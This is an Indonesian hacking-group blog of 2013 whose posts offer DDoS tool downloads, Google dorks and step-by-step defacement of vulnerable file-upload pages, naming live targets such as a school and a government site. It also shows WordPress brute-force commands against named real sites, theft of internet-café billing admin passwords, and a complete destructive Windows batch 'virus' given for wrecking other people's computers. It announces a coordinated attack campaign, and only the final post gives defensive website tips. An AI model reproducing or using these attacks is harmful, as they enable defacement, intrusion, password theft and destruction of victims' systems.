Sabtu, 30 Maret 2013

DDOS X-Forum Hacking v.5



Tinggal Download : CLIK HERE

DDOS Di lengkapi dengan Virus Zombie
tinggal di download

MAAF buat link yang sebelum ya yang ada password :D
nih saya reload ulang link ya , jadi ngk ada password
maaf gan

INFO : Bisa digunakan dalam keadaan online dan offline 

Halaman Login admin


Nih Halman Login admin yg biasa nya digunakkan !

berikut halaman login ya :)

untuk Cpanel X :
Taruh di belakan URL itu :2082
contoh : www.target.com:2082

Login Wordpress :
Taruh di belakan Url itu /wp-admin/
contoh : www.target.com/wp-admin/

Untuk Website biasa nya :
  /admin
  /administrator
  /admin.php
  /login.php
  /backoffice/
  /account.asp
  /account.cfm
  /account.html

Letakkan pada di belakang url

Deface Dengan Teknik phUploader



CARA DEFACE DENGAN TEKNIK PHP UPLOADER

Dork :
    "phUploader.php" intext:.txt

Caranya gampang ikuti langkah di bawah ini !

titip nama aja X-Forum Hacking

Pertama Buka web ya menggunakkan Dork di atas

Ke dua klik Browse

Ke tiga klik Upload File(s)

Cara ya simple !

Jangan lupa titip nama X-Forum Hacking !

Minggu, 24 Maret 2013

Deface Dengan Teknik Encodable Upload Vulnerability


Deface Dengan Teknik Encodable Upload Vulnerability

hai sobat X-Forum Hacking , kali ini saya akan memberikan cara Deface dengan teknik Encodable Upload Vulnerability
biar pun teknik ini sudah cukup lama , masih banyak yg kepengan belajar deface xD
ok langsung aja lah , ngk usah pakek basa basi !!

cecedot >>>

DORK:
intext:File Upload by Encodable


Kalo udah Dapat langsung aja

Buka Web ya contoh punya saya :
http://target.com/upload

Klik Browse , Upload html/Deface mu kesitu .

klik Begin Upload

nih saya kasih target yg vuln 1 : CLIK HERE

Sabtu, 23 Maret 2013

X-Forum Hacking Akan Tuntaskan Op Myanmar!

Tanggal main 27-Maret-2013

X-Forum Siap Membakar Myanmar Pada Tanggal 27 Maret 2013

ALAT DAN PERSIAPAN BISA DI DOWNLOAD SINI

UNTUK DEFACE SILAKKAN MENGGUNAKAN FITURE CMD SAJA

JIKA ANDA MINAT SILAKKAN BERGABUNG DENGAN KAMI
>> http://www.facebook.com/groups/HackCode/

BAGI YG JUGA UDAH DEWA SILAKKAN MEMBANTU KAMI

KAMI AKAN TUNTASKAN #Op myanmar

SEMAMPU KAMI !

DDOS X-Forum Hacking V.2




Download Tools DDOS X-FORUM HACKING

Baru dengan Fiture Virus 3 Zombie yg akan merusak system keamanaan suatu website
fiture gampang , tinggal didownload aja xD

JOIN GROUPS : #X-FORUM HACKING

Jumat, 22 Maret 2013

DDOS X-Forum Hacking V.1

DOWNLOAD >> CLIK HERE

1. URL : Massukan Target kamu
2. Threads : Biar kan Saja Tetap 1000
3. Massage : Massage ya juga biar kan aja
4. Tinggal klik Attack X-Forum Hacking

FIRE FIRE FIRE !!!!!

Credit : Adiyatma Buyung & ALL Memeber X-Forum Hacking

Simple Tapi Pasti !

Cara Menyamarkan IP Address Keluar negeri

Tips Kali ini X-Forum Hacking akan Memberikan cara ,bagaimana Menyamarkan IP Address Keluar negeri
langsung ikuti cara cara tersebut !! xD


pertama pastikan browser yang anda pakai saat ini sudah Mozilla dan pastikan anda menghapus Riwayat jelajah saat tadi kita berinternet.
Caranya ? Tekan CTRL+SHIFT+Delete di keyboard anda.


Contoh gambar :







Setelah kita Menghapus semua Riwayat jelajah kita tadi, maka kiata akan lanjut ke tutorial berikutnya.!!
Mengubah IP Kita Menjadi IP Address Negara atau Kota Lain

Memang sih.. Trik ini sedikit ribet tapi hasilnya bisa di abadikan HHeehee. Ini adalah gambaran sebelum aku mengganti IP Address-nya :




Terlihat adalah Lokasi saya berasal dari jakarta Indonesia.

Langkah berikutnya adalah saya akan mengkses situs penyedia Port Proxy gratisan anda juga bisa menemuinya di si mbah google bagi yang gax mau ribet masuk saja sini http://proxy-list.org
Saya akan coba mengganti IP Adressnya dengan IP-Address U.S.A.
Isi List proxy seperti gambar di bawah ini :
http://proxy-list.org



Ketika kita menemukan Proxy US kita sebaiknya Copas saja code proxy tersebut lihat gambar :



Setelah itu,saya akan isikan IP beserta Portnya pada jendela Option browser yang saya pakai[disini Mozilla Firefox],lihat gambar di bawah ini biar jelas: Pertama,pilih Tools>>Option>>Advance>>Setting:




Lalu akan muncul gambar seperti di bawah ini:

Stelah kita masukan IP lihat gambar dibawah ini :



Setelah itu klik 'OK' dan 'OK' lagi. kemudian mari kita akan membuktikan bahwa kita sudah memiliki IP-Address dengan Ip U.S.A : www.ip-adress.com


Nah terbuktikan kita bisa mengganti IP-Address dengan cara ribet tapi gampang.!
Selamat mencoba ya.!!

Cara mengetahui password admin billing explorer By Sopyan



 Ok Semua nya kali ini sebelum saya menghadapi UAS .
Saya akan berbagi sedikit ilmu tentang bagaimana mengetahui password admin dan cara login admin agar kalian bisa main geratis dan gregett xDD

Tutorialnya sangatlah mudah dan simple tetapi konsekuensinya juga tentu saja sangatlah berbahaya apalagi kalau sampai ketauan OP anda bisa di Jitak di bayar billing Double Bukanya nakut nakutin memang mau nakutin sih hahaha :P

Langsung saja deh

Ini Video nya :
BUKA VIDEO YA >> http://www.youtube.com/watch?feature=player_embedded&v=MWG2lmry4Ak


Saran saya sebelum melihat video tutorial lebih baik anda baca dulu tutorial teks dan gambar di bawah ini, karena agar anda memahami dan tidak salah jalan menggunakannya.

Bahan bahan yang di perlukan :

  • HackClient Download Click Here
    Password : sopyan-7.blogspot.com
    No Virus gan aman buat kesehatan komputer nya :P
  • Harus Billing Explorer
Pertama-tama sebelum kita bisa masuk melalui Fitur admin yang ada di billing tetunya kita harus tau password dan code-code lainnya yuk tkp
  1. File HackClient yang telah di download silahkan di extract dan masukan password nya : sopyan-7.blogspot.com
  2. Lalu Buka Aplikasi yg bernama : hackclient
  3. Nanti di sana bakalan keluar data-data pribadi pemilik warnet xDD
    Ya contohnya seperti ini :
    ( NB: Password dan data-data admin akan berbeda beda di setiap warnet )

    Tuh data nya muncul yuk kita ingat"
     *Password admin Client : kodir
     *Passwrod Security Client : 008

1. Sekarang kalau billing kita udah abis atau kita baru mau main di net
nah kan kita di tampilan utama Biasa nya ada gambar
(Lumba-Lumbanya) Cekidott

2. Lalu Click Button Admin## nanti akan keluar anu nya xD
Terus kita masukin deh passwordnya , kalau password di net yg aku test adalah : kodir
*Liat Step no 4 untuk cara mengetahui
cekidott


3. Setelah di masukan Password nya Lalu Click Ok
Nanti bakalan Keluar lagu anu nya kek gini xD ...
 4 . Click Button Exit Client And Password Nanti bakalan keluar anunya lagi gan :D

 5. Masukin password nya gan .. Kalau password di net yg ane test adalah : 008
    NB: Cara Check passwordnya lihat step no 4
    Lalu Click Ok
 6. Setelah Click Ok
     Nanti muncul anu nya lagi deh xD Cekidott
 7. Hapus tanda *** yang ada di box Security Client sehingga box itu menjadi kosong
 8. Lalu Click Button Exit Client 
Dan Taraaa anda masuk ke dekstop dan siap untuk jaga jaga dan siap untuk main gratis huahahah XDD
Resiko apapun di tanggung oleh pemenangya gan .. ane ga tanggung jawab atas penyalah gunaannya ..
[*] Semua yg di lakukan anda , di luar tanggung jawab saya.
[*] Kami Hanya berbagi , untuk maksud sebagai Pembelajaran .
[-] NB : Jangan di Persalah Gunakan ..


Terimakasih / Sumber referensi :
- Code c0d3HitLER
- X-Forum Hacking
- Binus Hacker
- 0Rz Team
- Sopyan-7

Cara Mencari Halaman Login Wordpress

Tips Kali ini Saya akan memberikan cara simple menemukan halaman Login admin Wordpress

Langsung aja Ke TKP yaa !!!!

[-] Siapkan Target Web anda
Contoh : www.Target.com

[-] Buka Target Tersebut

[-] Kasih ini di belakang target tersebut /wp-admin/
Contoh : www.target.com/wp-admin/

[-] Siap dah Tinggal Login !!!

BY : X-FORUM HACKING [HACK CODE]


Cara Deface site Wordpress Menggunakan WP Brute Force

Nitip Nama X-Forum Hacking

Pertama Download Bahan-Bahannya:

WPBruteforce

Password : idca

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://www.van-wieringen.nl

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute


Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D

Saya sih ambil dari Team IDCA !
Jangan lupa nitip nama X-Forum Hacking

Kamis, 21 Maret 2013

Cara Deface Website Dengan Teknik Web KindEditor

Kali ini Saya Admin X-Forum Haking , Akan Memberikan Cara Deface Dengan Teknik KindEditor
untuk Newbie By X-Forum Hacking

Ok, Langsung aja kita mulai defacenya ^^
Masukan Dorknya ke kotak pencarian Google :
Atau langsung saja klik dork diatas

Exploit :

  • http://www.contohtarget.com/path/kindeditor/examples/uploadbutton.html
1. Kalo web target udah dapet, kita klik upload,




2. Kemudian pilih HTML defecan agan. Contoh disini kita menggunakan HTML saya 


3. Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL



4. Kemudian kalo sudah, tekan Enter.
5. Finish

Jangan Lupa Nitip Nama: X-Forum Hacking !


Bagi kalian yg susah cari Web yg Vuln,nih udah gua kasih web yg vuln dibawah !

Senin, 11 Maret 2013

Cara membuat facebook terblokir tanpa harus Login Ke Facebook !



Tips Kali ini Saya Dari X-Forum Hacking !
akan Memberikan Tips membuat facebook terblokir/nonaktif tanpa harus Login ke Facebook !

Kali ini Tips ya simple kok !
Tapi ini Bukan untuk tindak kriminal ok !
ini cuman untuk pelajaran aja , kan kasihan orang yg punya facebook xD

ayo langsung ke tkp !
Langsung ikuti cara ya !

[+] Buka Facebook : >> Facebook
[+] Masukkan Email Target anda ke Tempat Email itu !
[+] Buat Password ya Masukkan Script Di bawah !
<down><ul>B-y-R-M-0-0-7<ul><passer><md>/<down>
[+] Lalu klik Enter Terus menerus Tanpa Berhenti !
[+] Sampai ada Tulisan " MAAF FACEBOOK ANDA SUDAH KAMI BLOKIR " xD

Itu Untuk Pelajaran aja ya Mas Bro xD

Cara ini gua dapat dari Teman Teman yg ada di Hacker Batam xD

Groups : #X-Forum Hacking [Hack Code]

Cara Membuat Komputer/Laptop Orang Rusak !






Hello Sahabat X-Forum Hacking !
Kali ini saya akan memberikan Cara Merusak Komputer orang lain .
Dengan Memasukkan Virus berbahaya ke komputer orang tersebut !
Walaupun ini tindak Kriminal , saya rasa ini cuman untuk pelajaran saja bagi anda !

SEBELUM KE TKP BACA DULU YG DIBAWAH INI !
" TOLONG JANGAN LAKUKAN INI DI KOMPUTER/LAPTOP ANDA SENDIRI KARENA ITU MENGAKIBATAKAN FATAL "

Ok Langsung aja ke KTP >>>

[-] Buka Notepad >
[-] Copy Tulisan Dibawah ini

 @echo off
copy bosgentongsvirus.bmp %systemdrive%\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\system32\ /y
copy bosgentongsvirus.exe %systemdrive%\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\system32\ /y
reg add �HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon� /v LegalNoticeCaption /d �
KOMPUTER DALAM KEADAAN SANGAT BURUK AKIBAT VIRUS� /f
reg add �HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon� /v LegalNoticeText /d �
SISTEM MEMORY TELAH RUSAK MATIKAN KOMPUTER� /f
reg add �HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run� /v bosgentongsvirus /d %systemdrive%\windows\system32\bosgentongsvirus.exe /f
reg add �HKEY_CURRENT_USER\Control Panel\Desktop� /v Wallpaper /d
%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
reg add �HKEY_CURRENT_USER\Control Panel\Desktop� /v WallpaperStyle /d 0 /f
reg add �HKEY_CURRENT_USER\Control Panel\Colors� /v window /d #C10000 /f
reg add �HKEY_USERS\.DEFAULT\Control Panel\Desktop� /v Wallpaper /d
%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ������������������-
echo ============= BOSGENTONGS love HACKER ==============
echo ============= bosgentongs inc. Team ==============
echo ============= Kediri, 16 Juli 2009 ==============
echo ������������������-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo Do you want to kill all program�s? (Y/N)
pause >nul
cls
echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
echo Deleting All Data
ping localhost -n 2 >nul
cls
echo Deleting All Data.
ping localhost -n 2 >nul
cls
echo Deleting All Data..
ping localhost -n 2 >nul
cls
echo Deleting All Data�
cls
Echo Deleting All Data�.
ping localhost -n 2 >nul
cls
Echo Deleting All Data�..
ping localhost -n 2 >nul
cls
Echo Deleting All Data��..
ping localhost -n 2 >nul
cls
Echo All data have been Deleted
ping localhost -n 2 >nul
cls
Echo System Error
Echo System can�t open windows Folder
Echo Warning! Sistem shutting down
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 5400 -c �
VIRUS INI TELAH MERUSAK SISTEM MEMORY DAN OPERASI MATIKAN KOMPUTER!!
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus

[-] Klik Save > Kasih Nama : DownPc.bat

Udah jadi dahh xD

BACA >

" TOLONG JANGAN LAKUKAN INI DI KOMPUTER/LAPTOP ANDA SENDIRI KARENA ITU MENGAKIBATAKAN FATAL "

JOIN GROUPS : #x-Forum Hacking

Sabtu, 09 Maret 2013

Cara Deface web dengan teknik Remote File Upload Exploit Vulnerability

Ngga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.

Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :


Dork :
- inurl:/editor/editor/filemanager/
- inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.



2). Pilih salah satu website sebagai target.



3). Tampilan Webitenya nanti akan seperti ini.



4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html



6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.



8). Lalu klik Send it to the Server.



9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.



10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :

http://www.ariquemes.ro.gov.br//editor/images/test2.html

Nitip Nama ya om : X-Forum Hacking

Groups : #X-ForumHacking [Hack Code]

--

Jumat, 08 Maret 2013

Cara Deface Web yg berdomain Sch.id untuk Newbie



Hai Sobat X-Forum Hacking !!! xD
Kali ini kami akan memberikan Tutorial Cara Deface Web yg domain ya Sch.id Bagi Newbie !

Langsung aja Cecodot !!! eh salah cekidot maksudnya xD

Dork Untuk Mencari Target yg Vuln :

[-] inurl:/html/siswa.php?
[-] inurl:/html/alumi.php?
[-] inurl:/html/guru.php?

Kalo Udah Dapat Target ya Langsung ikuti cara berikut !

Contoh target saya :
http://www.sman1kotabaru.sch.id/html/siswa.php?id=profil&kode=47&profil=Sistem%20Point

yg warna merah ganti menjadi dengan ini
/editor/filemanager/connectors/uploadtest.html

Hingga menjadi seperti ini :
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html

[-] yg ada nama ya ASP Ganti Menjadi PHP
[-] Buka Notepad , Tulis Website Is Hacked By X-ForumHacking
[-] Save Notepad ya , Kasih Nama Admin.txt
[-] Upload Notepat tadi ke Target kita yang tadi kita buat
[-] Tekan Send it to the Server

Hingga Menjadi Seperti ini :
http://www.sman1kotabaru.sch.id/userfiles/Rialdi.txt

Selamat Mencoba xD

Credit : X-Forum Hacking [Hack Code]

Group : #X-ForumHacking [Hack Code]


Tips Mengamankan Web dari Hacker


Berikut ini adalah beberapa tips dalam Membangun Websites yang tidak mudah di jebol Hacker. Tips ini dibuat oleh moderator komunitas white hacker Yogyafree, Nathan Gusti Ryan.
Sehubungan dengan maraknya deface atau hacking isi websites pemerintah maupun organisasi besar maka berikut ini berbagai tips yang dapat dilakukan oleh web administrator untuk membangun Webserver yang tangguh dan tidak mudah dibobol oleh Hacker.

Langkah Pertama
Pada umumnya, hosting websites dilakukan pada ISP (Internet Service Provider) dengan space tertentu, lalu kita melakukan upload website via FTP atau via CPANEL (Control Panel). Webhosting inilah yang rawan dan mudah sekali dibobol oleh Hacker di antaranya mengunakan teknik SQL Injection. Maka disarankan agar mengunakan Server sendiri dan mengunakan VPS (Virtual Private Server). Dengan Server sendiri atau Virtual Private Server bisa mengunakan berbagai proteksi terhadap kita secara Customized. Beda dengan Web Hosting, proteksi security dilakukan terserah apa kata ISP. Kelemahan proteksi inilah yang dimanfaatkan oleh Hacker dengan melakukan Port Scanning untuk menemukan celah security yang bisa ditembus untuk bisa masuk dan mengambil alih websites tersebut.




Langkah Kedua
Mengunakan Hardware Security yang powerfull diantaranya yang memiliki fitur Firewall, IDS (Intrusion Detection System) dan IPS (Intrusion Prevention System). Contohnya mengunakan Fortigate, Cisco Series Security, 3Com Tipping Point, dan lainnya. Dapat juga mengunakan software IDS seperti Black ICE Countermeasures ataupun Distro Linux untuk security system seperti Smootwall, Monowall, Customized Distro Linux, dan lainnya. Umumnya, baik software maupun hardware security ini bisa secara otomatis mengirimkan email alert bahkan bisa mengirimkan alert via SMS jika system mendeteksi adanya serangan dari hacker.

Langkah Ketiga
Mengunakan system yang Stable yang sudah perfect systemnya, sehingga kemungkinan adanya celah keamanan juga dapat diminimalkan. Banyaknya software atau tool web builder dengan berbagai versi terutama versi gratis/ free License/ Freeware, sebaiknya para pemakai memilih versi yang sudah dinyatakan Stable. Seperti adanya BUG pada software Joomla versi 1.5.0 � 1.5.5.


Langkah Keempat
Web Administrator/ System Administrator harus melakukan Review, Testing, Simulasi secara berkala terhadap keamanan pada Server yang dikelolanya. Bahkan bisa bekerja sama dengan Hacker (White Hacker yang dapat dipercaya reputasinya) untuk melakukan Audit terhadap implementasi Security. [okezone]